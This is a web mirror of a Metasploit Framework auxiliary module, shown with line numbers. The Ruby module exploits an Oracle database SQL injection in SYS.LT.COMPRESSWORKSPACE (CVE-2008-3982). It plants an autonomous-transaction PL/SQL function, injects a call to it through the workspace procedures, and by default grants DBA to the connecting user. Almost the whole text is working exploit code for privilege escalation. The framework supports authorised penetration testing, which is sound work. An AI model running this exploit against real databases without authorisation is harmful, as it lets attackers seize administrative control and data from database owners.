Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb
19721 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::ORACLE
8
9
def initialize(info = {})
10
super(
11
update_info(
12
info,
13
'Name' => 'Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE',
14
'Description' => %q{
15
This module exploits an sql injection flaw in the COMPRESSWORKSPACE
16
procedure of the PL/SQL package SYS.LT. Any user with execute
17
privilege on the vulnerable package can exploit this vulnerability.
18
},
19
'Author' => [ 'CG' ],
20
'License' => MSF_LICENSE,
21
'References' => [
22
[ 'CVE', '2008-3982'],
23
[ 'OSVDB', '49324'],
24
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
25
],
26
'DisclosureDate' => '2008-10-13',
27
'Notes' => {
28
'Stability' => [CRASH_SAFE],
29
'SideEffects' => [IOC_IN_LOGS],
30
'Reliability' => []
31
}
32
)
33
)
34
35
register_options(
36
[
37
OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),
38
]
39
)
40
end
41
42
def run
43
return if !check_dependencies
44
45
name = Rex::Text.rand_text_alpha_upper(1..10)
46
cruft = Rex::Text.rand_text_alpha_upper(1)
47
48
function = "
49
CREATE OR REPLACE FUNCTION #{cruft}
50
RETURN VARCHAR2 AUTHID CURRENT_USER
51
AS
52
PRAGMA AUTONOMOUS_TRANSACTION;
53
BEGIN
54
EXECUTE IMMEDIATE '#{datastore['SQL']}';
55
COMMIT;
56
RETURN '#{cruft}';
57
END;"
58
59
package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"
60
61
package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;"
62
63
clean = "DROP FUNCTION #{cruft}"
64
65
print_status('Attempting sql injection on SYS.LT.COMPRESSWORKSPACE...')
66
67
print_status('Sending function...')
68
prepare_exec(function)
69
70
begin
71
prepare_exec(package1)
72
prepare_exec(package2)
73
rescue StandardError => e
74
if (e.to_s =~ /No Data/)
75
print_status("Removing function '#{cruft}'...")
76
prepare_exec(clean)
77
else
78
return
79
end
80
end
81
end
82
end
83
84